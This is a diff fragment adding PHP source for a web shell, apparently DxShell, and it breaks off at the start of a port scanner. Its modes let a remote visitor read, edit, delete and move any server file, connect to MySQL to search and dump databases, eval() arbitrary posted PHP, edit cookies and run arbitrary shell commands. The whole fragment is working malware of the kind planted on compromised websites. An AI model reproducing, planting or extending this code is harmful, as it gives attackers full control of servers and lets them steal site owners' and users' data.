+	print "\n\n\n".'<br><hr><!-- File contents goes from here -->'."\n";
+	print "\n".'<plaintext>';
+	print file_get_contents($_GET['dxfile']);
+	die(); /* Plaintext is infinite */
+	}
+
+########
+########   File Edit
+########
+if ($_GET['dxmode']=='F_ED')
+	{
+	if (!is_file($_GET['dxfile']))  	die(DxError('Hey! Find out how to read a directory in notepad, and u can call me "Lame" =) '));
+	if (isset($_POST['dxparam']))
+		{
		if (!is_writable($_GET['dxfile']))  die(DxError('File is not writable. Perms?...'));
+		if (($f=fopen($_GET['dxfile'], 'w'))===FALSE) die(DxError('File open for WRITE failed'));
+		if (fputs($f, $_POST['dxparam'])===FALSE)	die(DxError('I/O: File write failed'));
+		fclose($f);
+		print 'File saved OK;';
+		}
+		else
+		{
+		if (!is_readable($_GET['dxfile']))  die(DxError('File is not readable. Perms?...'));
+		if (!is_writable($_GET['dxfile'])) DxWarning('File is not writable!');
		print "\n".'<font class=highlight_txt>'.$_GET['dxfile'].'</font>';
+		print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+		print "\n".'<textarea name="dxparam" rows=30 style="width:90%;">'.str_replace(array('<','>'),array('&lt;','&gt;'), file_get_contents($_GET['dxfile'])).'</textarea>';
+		print "\n".'<br><input type=submit value="Save" style="width:100pt;height:50pt;font-size:15pt;" class=submit>';
+		print "\n".'</form>';
+		}
+	}
+
+########
+########   File Delete
+########
+if ($_GET['dxmode']=='F_DEL')
+	{
		if (isset($_GET['dx_ok']))
+			{
		if ($_GET['dx_ok']=='Yes')
+			{
			if (	(is_file($_GET['dxfile']) AND !unlink($_GET['dxfile']))  OR  (is_dir($_GET['dxfile']) AND !rmdir($_GET['dxfile']))		)
+				print DxError('Unable to delete file. Perms?...<br>');
+				else
+				{
				print "\n".'Delete( <font class=highlight_txt>'.$_GET['dxfile'].'</font> ) <b>OK</b>';
+				DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])));
+				}
+			}
+		}
+		else
+		{
+		if (!is_writable($_GET['dxfile'])) DxWarning('File is not writable!');
		print "\n".'<form action="'.DxURL('kill', '').'" method=GET>';
+		DxGETinForm('leave', 'dxmode,dxfile');
+		print "\n".'<table border=0 cellspacing=0 cellpadding=0 align=center><tr><td>'
+					."\n".'<font class=achtung>(!)</font> Do you really want to <font class=highlight_txt>DELETE '.$_GET['dxfile'].'</font> ?'
+					."\n".'<div align=right><input type=submit name="dx_ok" value="No" class=bt_No><input type=submit name="dx_ok" value="Yes" class=bt_Yes>'
+					."\n".'</td></tr></table>';
+		print "\n".'</form>';
+		}
+	}
+
+########
+########   File Rename
+########
+if ($_GET['dxmode']=='F_REN')
+	{
+	if (isset($_POST['dxparam']))
+		{
+		if (!rename($_GET['dxfile'], dirname($_GET['dxfile']).'/'.$_POST['dxparam']))
+			print DxError('Unable to rename. Perms?...<br>');
+			else
+			{
+			print "\n".'Rename( <font class=highlight_txt>'.$_GET['dxfile'].'</font> -> <font class=highlight_txt>'.dirname($_GET['dxfile']).'/'.$_POST['dxparam'].'</font> ) <b>OK</b>';
+			DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])));
+			}
+		}
+		else
+		{
+		print "\n".'<form action="'.DxURL('leave', 'dxmode,dxfile').'" method=POST>';
+		print "\n".'<input type=text name="dxparam" value="'.basename($_GET['dxfile']).'" style="width:80%">';
+		print "\n".'<input type=submit value="Rename" class="submit"></form>';
+		}
+	}
+
+########
+########   File Copy
+########
+if ($_GET['dxmode']=='F_COP')
+	{
+	if (!is_file($_GET['dxfile'])) die(DxError('Don\'t even think about copuing directories! =))'));
+
+	$newname=$_GET['dxfile'].'__DxS_COPY_'.DxRandomChars(3);
+	if (($extpos=strrpos($_GET['dxfile'], '.'))>strrpos($_GET['dxfile'], '/')) /* file has an extension */
+		$newname=substr($_GET['dxfile'], 0, $extpos).'__DxS_COPY_'.DxRandomChars(3).substr($_GET['dxfile'], $extpos);
+	print $newname;
+	if (!copy($_GET['dxfile'], $newname))
+		print DxError('Unable to copy. Perms?...<br>');
+		else
+		{
+		print "\n".'Copy( <font class=highlight_txt>'.$_GET['dxfile'].'</font> -> <font class=highlight_txt>'.$newname.'</font> ) <b>OK</b>';
+		DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])));
+		}
+	}
+
+########
+########   File Move
+########
+if ($_GET['dxmode']=='F_MOV')
+	{
+	if (isset($_POST['dxparam']))
+		{
+		if (!rename($_GET['dxfile'], $_POST['dxparam']))
+			print DxError('Unable to rename. Perms? Or no path?...<br>');
+			else
+			{
+			print "\n".'Move( <font class=highlight_txt>'.$_GET['dxfile'].'</font> -> <font class=highlight_txt>'.$_POST['dxparam'].'</font> ) <b>OK</b>';
+			DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_POST['dxparam'])));
+			}
+		}
+		else
+		{
+		if (!is_writable($_GET['dxfile'])) DxWarning('File is not writable!');
+		print "\n".'<form action="'.DxURL('leave', 'dxmode,dxfile').'" method=POST>';
+		print "\n".'<input type=text name="dxparam" value="'.DxFileOkaySlashes(realpath($_GET['dxfile'])).'" style="width:80%">';
+		print "\n".'<input type=submit value="M0ve" class="submit"></form>';
+		}
+	}
+
+if (substr($_GET['dxmode'],0,2)=='F_')
+	{/* file actions */
+	print "\n\n".'<br><br>'.'<a href="'.DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])).'">[Go DIR]</a>';
+	}
+
+		###################################
+
+########
+########   SQL Maintenance
+########
+if ($_GET['dxmode']=='SQL')
+	{
	if (!isset($_GET['dxsql_s'], $_GET['dxsql_l'], $_GET['dxsql_p']))
+		{
		print "\n".'<h2>MySQL connection</h2>';
+		print "\n".'<form action="'.DxURL('kill', '').'" method=GET align=center>';
+		DxGETinForm('leave', 'dxmode');
+		print "\n".'<br>Serv: <input type=text name="dxsql_s" value="localhost" style="width:200pt">';
+		print "\n".'<br>Login:<input type=text name="dxsql_l" value="" 	 	style="width:200pt">';
+		print "\n".'<br>Passw:<input type=password name="dxsql_p" value="" 	style="width:200pt">';
+		print "\n".'<br><input type=submit value="C0nnect" class="submit" style="width:200pt;"></form>';
+		die();
+		}
+	if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0))
+		die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+		else print '&gt;&gt; MySQL connected!';
+
+	$mysqlver=mysql_fetch_row(mysql_query("SELECT VERSION()"));
+	print str_repeat('&nbsp;',15).'MySQL version: <font class="highlight_txt">'.$mysqlver[0].'</font>';
+
+	DxMySQL_FetchResult(DxMySQLQ('SHOW DATABASES;', true), $DATABASES, true);
+	for ($i=0;$i<count($DATABASES);$i++)
+		$DATABASES[$i][1]=mysql_num_rows(DxMySQLQ('SHOW TABLES FROM `'.$DATABASES[$i][0].'`;', false));
+
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0>'
+				.'<tr><td class=h2_oneline><h1>DB:</h1></td>';
+	if (!isset($_GET['dxsql_d']))
+		{
+		print "\n".'<td class=h2_oneline style="border-width:0pt;">';
+		print "\n".'<form action="'.DxURL('kill', '').'" method=GET>';
+		DxGETinForm('leave', 'dxmode,dxsql_s,dxsql_l,dxsql_p');
+		print "\n".'<SELECT name="dxsql_d" onchange="this.form.submit()">';
+		print "\n\t".'<OPTION value="">&lt;Server&gt;</OPTION>';
+		for ($i=0;$i<count($DATABASES);$i++)
+		print "\n\t".'<OPTION value="'.$DATABASES[$i][0].'">'
+			.'['.DxZeroedNumber($DATABASES[$i][1],3).']'.' '.$DATABASES[$i][0]
+			.'</OPTION>';
+		print "\n".'</SELECT><input type=submit value="-&gt;" class=submit"></form></td>';
+		print "\n".'</tr></table>';
+		die();
+		}
+		else print "\n".'<td class=linelisting><font class=highlight_txt>'.((empty($_GET['dxsql_d']))?'&lt;Server&gt;':$_GET['dxsql_d']).'</font></td>'
+						.'<td class=linelisting><a href="'.DxURL('kill', 'dxsql_d').'" class=no>[CH]</a></td>'
+						.'<td class=linelisting><a href="'.DxURL('kill', 'dxmode').'&dxmode=SQLS" class=no>[Search in tables...]</a></td>'
+						.'<td class=linelisting><a href="'.DxURL('kill', 'dxmode').'&dxmode=SQLD" class=no>[Dump...]</a></td>'
+						.'</tr></table>';
+
+	if (!empty($_GET['dxsql_d']))
+		if (!mysql_select_db($_GET['dxsql_d']))
+			die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0 width=100%>';
+	print "\n".'<tr><td width=1% class=h2_oneline style="vertical-align:top;">';
+	if (!empty($_GET['dxsql_d']))
+		{
+		print "\n\t".'<table  border=0 cellspacing=0 cellpadding=0>';
+		print "\n\t".'<caption>Tables:</caption>';
+		DxMySQL_FetchResult(DxMySQLQ('SHOW TABLES;', true), $TABLES, true);
+		for ($i=0;$i<count($TABLES);$i++) $TABLES[$i]=$TABLES[$i][0];
+		asort($TABLES);
+		for ($i=0;$i<count($TABLES);$i++)
+			{
+			DxMySQL_FetchResult(DxMySQLQ('SELECT COUNT(*) FROM `'.$TABLES[$i].'`;', true), $TRowCnt, true);
			print "\n\t".'<tr><td class="listing"><nobr>'.(($TRowCnt[0][0]>0)?'&gt; ':'&nbsp;&nbsp;').$TABLES[$i].'</td></tr>';
+			}
+		print "\n\t".'</table>';
+		}
+	print "\n".'</td><td  width=100%>';
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'[?] Can run several querys if divided by ";"<br>If smth is wrong with charset, write first: SET NAMES cp1251;';
+	print "\n".'<textarea name="dxsql_q" rows=10 style="width:100%;">'.((empty($_POST['dxsql_q']))?'':$_POST['dxsql_q']).'</textarea>';
+	print "\n".'<div align=right>'
+				.'<input type=submit value="Query" class="submit"> '
+				.'<input type=submit name="dxparam" value="Download Query" class="submit"></div></form>'
+				.'<br>';
+
+	if (empty($_POST['dxsql_q'])) die('</td></tr></table>');
+	$_POST['dxsql_q']=explode(';', $_POST['dxsql_q']);
+
+	foreach ($_POST['dxsql_q'] as $CUR_Q)
+		{
		if (empty($CUR_Q)) continue;
+		$CUR_Q.=';';
+
+		$num=DxMySQL_FetchResult(DxMySQLQ($CUR_Q, true), $FETCHED, false);
+		if ($num<=0) continue;
+
+		print "\n\n\n".'<table border=0 cellspacing=0 cellpadding=0><caption>'.$CUR_Q.'</caption>';
+
+		$INDEXES=array_keys($FETCHED[0]);
+		print "\n\t".'<tr><td class="listing" colspan='.(count($INDEXES)+1).'>&gt;&gt; Fetched: '.$num. str_repeat('&nbsp;', 10). 'Affected: '.mysql_affected_rows().'</td></tr>';
+		print "\n\t".'<tr><td class="listing"><div align=center  class="highlight_txt">###</td>';
+		foreach ($INDEXES as $key) print '<td class="listing"><div align=center class="highlight_txt">'.$key.'</td>';
+		print '</tr>';
+
+		for ($l=0;$l<count($FETCHED);$l++)
+			{
+			print "\n\t".'<tr><td class="listing" width=40><div align=right class="highlight_txt">'.$l.'</td>';
+			for ($i=0; $i<count($INDEXES); $i++)
+				print '<td class="listing"> '.DxDecorVar($FETCHED[$l][ $INDEXES[$i] ], true).'</td>';
+			}
+
+		print "\n".'</table><br>';
+		}
+	print "\n".'</td></tr></table>';
+	}
+
+########
+########   SQL Search
+########
+if ($_GET['dxmode']=='SQLS')
+	{
+	if (!isset($_GET['dxsql_s'], $_GET['dxsql_l'], $_GET['dxsql_p'], $_GET['dxsql_d']))	die(DxError('SQL server/login/password/database are not set'));
+
+	if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0))
+		die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+		else print '&gt;&gt; MySQL connected!';
+
+	if (!mysql_select_db($_GET['dxsql_d']))
+		die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0><tr><td class=h2_oneline><h2>DB:</h2></td>';
+	print "\n".'<td class=linelisting><font class=highlight_txt>'.((empty($_GET['dxsql_d']))?'&lt;Server&gt;':$_GET['dxsql_d']).'</font></td></tr></table>';
+
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
	print "\n".'<table border=0 cellspacing=0 cellpadding=0 width=100%>';
+	print "\n".'<tr><td width=1% class=h2_oneline style="vertical-align:top;">';
+
+	DxMySQL_FetchResult(DxMySQLQ('SHOW TABLES;', true), $TABLES, true);
+	for ($i=0;$i<count($TABLES);$i++) $TABLES[$i]=$TABLES[$i][0];
+	asort($TABLES);
+
+	if (isset($_POST['dxsqlsearch']['txt']))
+		if (get_magic_quotes_gpc()==1) $_POST['dxsqlsearch']['txt']=stripslashes($_POST['dxsqlsearch']['txt']);
+
+	print "\n\t".'<SELECT MULTIPLE name="dxsqlsearch[tables][]" SIZE=30>';
+	for ($i=0;$i<count($TABLES);$i++)
+		{
+		DxMySQL_FetchResult(DxMySQLQ('SELECT COUNT(*) FROM `'.$TABLES[$i].'`;', true), $TRowCnt, true);
+		if ($TRowCnt[0][0]>0)
+			print "\n\t".'<OPTION value="'.$TABLES[$i].'" '
+				.(  (isset($_POST['dxsqlsearch']['tables']))?   ((in_array($TABLES[$i], $_POST['dxsqlsearch']['tables']))?'SELECTED':'')   :'SELECTED'  ).'>'
+				.$TABLES[$i].'</OPTION>';
+		}
+	print "\n\t".'</SELECT>';
+	print "\n".'</td><td  width=100%>';
+	print "\n".'<input type=text name="dxsqlsearch[txt]" style="width:100%;" value="'.((empty($_POST['dxsqlsearch']['txt']))?'':str_replace('"', '&quot;', $_POST['dxsqlsearch']['txt'])).'">';
+	print "\n".'<br>';
+	foreach (array('Any', 'Each', 'Exact', 'RegExp') as $cur_rad)
+		print '<input type=radio name="dxsqlsearch[mode]" value="'.strtolower($cur_rad).'" '
+			.(  (isset($_POST['dxsqlsearch']['mode']))?   (($_POST['dxsqlsearch']['mode']==strtolower($cur_rad))?'CHECKED':'')   :(($cur_rad=='Any')?'CHECKED':'')  )
+			.' class=radio>'.$cur_rad.'&nbsp;&nbsp;&nbsp;';
+	print "\n".'<div align=right><input type=submit value="Search..." class=submit style="width:100pt;"></div>';
+	print "\n".'</form>';
+
+	if (!isset($_POST['dxsqlsearch'])) die('</td></tr></table>');
+
+	if (empty($_POST['dxsqlsearch']['tables'])) die(DxError('No tables selected'));
+
+	if (in_array($_POST['dxsqlsearch']['mode'], array('any', 'each'))) $_POST['dxsqlsearch']['txt']=explode(' ', mysql_real_escape_string($_POST['dxsqlsearch']['txt']));
+		else $_POST['dxsqlsearch']['txt']=array($_POST['dxsqlsearch']['txt']);
+
+
+	$GLOBALFOUND=0;
+	foreach ($_POST['dxsqlsearch']['tables'] as $CUR_TABLE)
+		{
		$Q='SELECT * FROM `'.$CUR_TABLE.'` WHERE ';
+		$Q_ARR=array();
+		DxMySQL_FetchResult(DxMySQLQ('SHOW COLUMNS FROM `'.$CUR_TABLE.'`;', true), $COLS, true);   for ($i=0; $i<count($COLS);$i++) $COLS[$i]=$COLS[$i][0];
+		foreach ($COLS as $CUR_COL)
+			{
			if (in_array($_POST['dxsqlsearch']['mode'], array('any', 'each', 'exact')))
+				{
				for ($i=0;$i<count($_POST['dxsqlsearch']['txt']);$i++)
+				$Q_ARR[]=$CUR_COL.' LIKE "%'.($_POST['dxsqlsearch']['txt'][$i]).'%"';
+				}
+				else $Q_ARR[]=$CUR_COL.' REGEXP '.$_POST['dxsqlsearch']['txt'][0];
+
+			if ($_POST['dxsqlsearch']['mode']=='each')
+				{
				$Q_ARR_EXACT[]=implode(' AND ', $Q_ARR);
+				$Q_ARR=array();
+				}
+			}
+		if (in_array($_POST['dxsqlsearch']['mode'], array('any', 'exact'))) $Q.=implode(' OR ', $Q_ARR).';';
+		if ($_POST['dxsqlsearch']['mode']=='each') $Q.=' ( '.implode(' ) OR ( ', $Q_ARR_EXACT).' );';
+		if ($_POST['dxsqlsearch']['mode']=='regexp') $Q.=' ( '.implode(' ) OR ( ',$Q_ARR).' );';
+
+		/* $Q is ready */
+
+		if (($num=DxMySQL_FetchResult(DxMySQLQ($Q, true), $FETCHED, true))>0)
+			{
+			$GLOBALFOUND+=$num;
			print "\n\n".'<table border=0 cellspacing=0 cellpadding=0 align=center><caption>'.$num.' matched in '.$CUR_TABLE.' :</caption>';
+			print "\n\t".'<tr><td class=listing><font class="highlight_txt">'.implode('</td><td class=listing><font class="highlight_txt">', $COLS).'</td></tr>';
+			for ($l=0;$l<count($FETCHED);$l++)
+				{
+				print "\n\t".'<tr>';
+				for ($i=0; $i<count($FETCHED[$l]); $i++) print '<td class="listing"> '.DxDecorVar($FETCHED[$l][$i], true).'</td>';
+				print '</tr>';
+				}
+			print "\n".'</table><br>';
+			}
+		}
+	print "\n".'<br>Total: '.$GLOBALFOUND.' matches';
+
+	print "\n".'</td></tr></table>';
+	}
+
+########
+########   SQL Dump
+########
+if ($_GET['dxmode']=='SQLD')
+	{
	if (!isset($_GET['dxsql_s'], $_GET['dxsql_l'], $_GET['dxsql_p'], $_GET['dxsql_d']))	die(DxError('SQL server/login/password/database are not set'));
+
+	if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0))
+		die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+		else print '&gt;&gt; MySQL connected!';
+
+	if (!mysql_select_db($_GET['dxsql_d']))
+		die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0><tr><td class=h2_oneline><h2>DB:</h2></td>';
+	print "\n".'<td class=linelisting><font class=highlight_txt>'.((empty($_GET['dxsql_d']))?'&lt;Server&gt;':$_GET['dxsql_d']).'</font></td></tr></table>';
+
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0 width=100%>';
+	print "\n".'<tr><td width=1% class=h2_oneline style="vertical-align:top;">';
+
+	DxMySQL_FetchResult(DxMySQLQ('SHOW TABLES;', true), $TABLES, true);
+	for ($i=0;$i<count($TABLES);$i++) $TABLES[$i]=$TABLES[$i][0];
+	asort($TABLES);
+
+	print "\n\t".'<SELECT MULTIPLE name="dxsql_tables[]" SIZE=30>';
+	for ($i=0;$i<count($TABLES);$i++)
+		{
+		DxMySQL_FetchResult(DxMySQLQ('SELECT COUNT(*) FROM `'.$TABLES[$i].'`;', true), $TRowCnt, true);
+		if ($TRowCnt[0][0]>0)
+			print "\n\t".'<OPTION value="'.$TABLES[$i].'" SELECTED>'.$TABLES[$i].'</OPTION>';
+		}
+	print "\n\t".'</SELECT>';
+	print "\n".'</td><td  width=100%>You can set a pre-dump-query(s) (ex: SET NAMES cp1251; ):';
+	print "\n".'<input type=text name="dxsql_q" style="width:100%;">';
+	print "\n".'<br>';
+	print "\n".'<div align=right>'
+		.'GZIP <input type=checkbox name="dx_gzip" value="Yeah, baby">'.str_repeat('&nbsp;', 10)
+		.'<input type=submit value="Dump!" class=submit style="width:100pt;"></div>';
+	print "\n".'</form>';
+	}
+
+		###################################
+
+########
+########   PHP Console
+########
+if ($_GET['dxmode']=='PHP')
+	{
+	if (isset($_GET['dxval'])) $_POST['dxval']=$_GET['dxval'];
+
+	print "\n".'<table border=0 align=right><tr><td class=h2_oneline>Do</td><td class="linelisting">';
+	$PRESETS=array_keys($GLOB['VAR']['PHP']['Presets']);
+	for ($i=0; $i<count($PRESETS);$i++)
+		print "\n\t".'<a href="'.DxURL('leave', 'dxmode').'&dxval=dxpreset__'.$PRESETS[$i].'" class=no>['.$PRESETS[$i].']</a>'
+						.(  ($i==(count($PRESETS)-1))?'':str_repeat('&nbsp;',3)  );
+	print "\n\n".'</td></tr></table><br><br>';
+
+	if (isset($_POST['dxval']))
+		if (strpos($_POST['dxval'], 'dxpreset__')===0)
+			{
			$_POST['dxval']=substr($_POST['dxval'], strlen('dxpreset__'));
+			if (!isset($GLOB['VAR']['PHP']['Presets'][$_POST['dxval']])) die(DxError('Undeclared preset'));
+			$_POST['dxval']=$GLOB['VAR']['PHP']['Presets'][$_POST['dxval']];
+			}
+
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<textarea name="dxval" rows=15 style="width:100%;">'.((isset($_POST['dxval']))?$_POST['dxval']:'').'</textarea>';
+	print "\n".'<div align=right><input type=submit value="Eval" class="submit" style="width:200pt;"></div>';
+	print "\n".'</form>';
+	if (isset($_POST['dxval']))
+		{
		print str_repeat("\n", 10).'<!--php_eval-->'."\n\n".'<table border=0 width=100%><tr><td class=listing>'."\n\n";
+		eval($_POST['dxval']);
+		print str_repeat("\n", 10).'<!--/php_eval-->'.'</td></tr></table>';
+		}
+	}
+
+		###################################
+
+########
+########  Cookies Maintenance
+########
+if ($_GET['dxmode']=='COOK')
+	{
+	if ($DXGLOBALSHIT) DxWarning('Set cookie may fail. This is because "'.basename($_SERVER['PHP_SELF']).'" has fucked up the output with it\'s shit =(');
	print 'Found <font class="highlight_txt">'.($CNT=count($_COOKIE)).' cookie'.(($CNT==1)?'':'s');
+
+	print "\n".'<div align=right><a href="'.DxURL('leave', '').'">[RELOAD]</a></div>';
+
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<table border=0 align=center><tr><td class=linelisting><div align=center><font class="highlight_txt">Cookie name</td><td class=linelisting><div align=center><font class="highlight_txt">Value</td></tr>';
+	for ($look_len=1, $maxlen=0; $look_len>=0;$look_len--)
+		{
+		if ($maxlen>100) $maxlen=100;
+		if ($maxlen<30) $maxlen=30;
+		$maxlen+=3;
+		for ($INDEXES=array_keys($_COOKIE), $i=0;$i<count($INDEXES);$i++)
+			{
+			if ($look_len) {if (strlen($_COOKIE[ $INDEXES[$i] ])>$maxlen) {$maxlen=strlen($_COOKIE[ $INDEXES[$i] ]);} continue;}
+
			print "\n".'<tr><td class=linelisting>'.$INDEXES[$i].'</td>'
+					.'<td class=linelisting><input type=text '
+							.'name="dxparam['.str_replace(array('"', "\n", "\r", "\t"),  array('&quot;',' ',' ',' '), $INDEXES[$i]).']" '
+							.'value="'.str_replace(array('"', "\n", "\r", "\t"), array('&quot;',' ',' ',' '), $_COOKIE[ $INDEXES[$i] ]).'" '
+							.'SIZE='.$maxlen.'></td>'
+					.'</tr>';
+			}
+		if (!$look_len)
+			{
+			print "\n".'<tr><td colspan=2><div align=center>[Set new cookie]</td></tr>';
+			print "\n".'<tr><td class=linelisting><input type=text name="dxparam[DXS_NEWCOOK][NAM]" value="" style="width:99%;"></td>'
+					.'<td class=linelisting><input type=text name="dxparam[DXS_NEWCOOK][VAL]" value="" SIZE='.$maxlen.'></td>'
+					.'</tr>';
			print "\n".'<tr><td class=linelisting colspan=2 style="text-align:center;">'
+					.'<input type=submit value="Save" class="submit" style="width:50%;">'
+					.'</td></tr>';
+			}
+		}
+	print "\n".'</table></form>';
+	}
+
+		###################################
+
+########
+########   Command line
+########
+if ($_GET['dxmode']=='CMD')
+	{
+	print "\n".'<table border=0 align=right><tr><td class=h2_oneline>Do</td><td>';
+	print "\n".'<SELECT name="selector" onchange="document.getElementById(\'dxval\').value+=document.getElementById(\'selector\').value+\'\n\'" style="width:200pt;">';
+	print "\n\t".'<OPTION></OPTION>';
+	$PRESETS=array_keys($GLOB['VAR']['CMD']['Presets']);
+	for ($i=0; $i<count($PRESETS);$i++)
+		print "\n\t".'<OPTION value="'.str_replace('"','&quot;',$GLOB['VAR']['CMD']['Presets'][ $PRESETS[$i] ]).'">'.$PRESETS[$i].'</OPTION>';
+	print "\n\n".'</SELECT></td></tr></table><br><br>';
+
+	if (isset($_POST['dxval']))
+		if (strpos($_POST['dxval'], 'dxpreset__')===0)
+			{
+			$_POST['dxval']=substr($_POST['dxval'], strlen('dxpreset__'));
+			if (!isset($GLOB['VAR']['CMD']['Presets'][$_POST['dxval']])) die(DxError('Undeclared preset'));
+			$_POST['dxval']=$GLOB['VAR']['CMD']['Presets'][$_POST['dxval']];
+			}
+
+	$warnstr=DxExecNahuj('',$trash1, $trash2);
+	if (!$warnstr[1]) DxWarning($warnstr[2]);

+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<textarea name="dxval" rows=5 style="width:100%;">'.((isset($_POST['dxval']))?$_POST['dxval']:'').'</textarea>';
+	print "\n".'<div align=right>'
+				.'<input type=submit value="Exec" class="submit" style="width:100pt;"> '
+				.'</div>';
+	print "\n".'</form>';
+	if (isset($_POST['dxval']))
+		{
+		$_POST['dxval']=split("\n", str_replace("\r", '', $_POST['dxval']));
+		for ($i=0; $i<count($_POST['dxval']); $i++)
+			{
+			$CUR=$_POST['dxval'][$i];
+			if (empty($CUR)) continue;
+
+			DxExecNahuj($CUR,$OUT, $RET);
+			print str_repeat("\n", 10).'<!--'.$warnstr[2].'("'.$CUR.'")-->'."\n\n".'<table border=0 width=100%><tr><td class=listing>'."\n\n";
+
+			print '<span style="position:absolute;left:10%;" class="highlight_txt">Return</span>';
+			print '<span style="position:absolute;right:30%;" class="highlight_txt">Output</span>';
+			print '<br><nobr>';
+			print "\n".'<textarea rows=10 style="width:20%;display:inline;">'.$CUR."\n\n".(	(is_array($RET))?implode("\n", $RET):$RET).'</textarea>';
+			print "\n".'<textarea rows=10 style="width:79%;display:inline;">'."\n".(	(is_array($OUT))?implode("\n", $OUT):$OUT).'</textarea>';
+			print '</nobr>';
+			print str_repeat("\n", 10).'<!--/'.$warnstr[2].'("'.$CUR.'")-->'."\n\n".'</td></tr></table>';
+			}
+		}
+	}
+
+		###################################
+
+########
+########   String functions
+########
+if ($_GET['dxmode']=='STR')
+	{
+	if (isset($_POST['dxval'], $_POST['dxparam']))
+		{
		$crypted='';
+		if ($_POST['dxparam']=='md5') $crypted.=md5($_POST['dxval']);
+		if ($_POST['dxparam']=='sha1') $crypted.=sha1($_POST['dxval']);
+		if ($_POST['dxparam']=='crc32') $crypted.=crc32($_POST['dxval']);
+		if ($_POST['dxparam']=='2base') $crypted.=base64_encode($_POST['dxval']);
+		if ($_POST['dxparam']=='base2') $crypted.=base64_decode($_POST['dxval']);
+		if ($_POST['dxparam']=='2HEX') for ($i=0;$i<strlen($_POST['dxval']);$i++) $crypted.=strtoupper(dechex(ord($_POST['dxval'][$i]))).' ';
+		if ($_POST['dxparam']=='HEX2') {$_POST['dxval']=str_replace(' ','',$_POST['dxval']); for ($i=0;$i<strlen($_POST['dxval']);$i+=2) $crypted.=chr(hexdec($_POST['dxval'][$i].$_POST['dxval'][$i+1]));}
+		if ($_POST['dxparam']=='2DEC') {$crypted='CHAR('; for ($i=0;$i<strlen($_POST['dxval']); $i++) $crypted.=ord($_POST['dxval'][$i]).(($i<(strlen($_POST['dxval'])-1))?',':')');}
+		if ($_POST['dxparam']=='2URL') $crypted.=urlencode($_POST['dxval']);
+		if ($_POST['dxparam']=='URL2') $crypted.=urldecode($_POST['dxval']);
+		}
+	if (isset($crypted)) print $_POST['dxparam'].'(<font class="highlight_txt"> '.$_POST['dxval'].' </font>) = ';
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<textarea name="dxval" rows=20 style="width:100%;">'.((isset($crypted))?$crypted:'').'</textarea>';
+	print "\n".'<div align=right>'
+		.'<input type=submit name="dxparam" value="md5" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="sha1" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="crc32" class="submit" style="width:50pt;"> '.str_repeat('&nbsp;', 5)
+		.'<input type=submit name="dxparam" value="2base" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="base2" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="2HEX" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="HEX2" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="2DEC" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="2URL" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="URL2" class="submit" style="width:50pt;"> '
+		.'</div>';
+	print "\n".'</form>';
+	}
+
+########
+########   Port scaner
+########
+if ($_GET['dxmode']=='PRT')
+	{
+	print '[!] For complete portlist go to <a href="http://www.iana.org/assignments/port-numbers" target=_blank>http://www.iana.org/assignments/port-numbers</a>';

+	if (isset($_POST['dxportscan']) or isset($_GET['dxparam']))
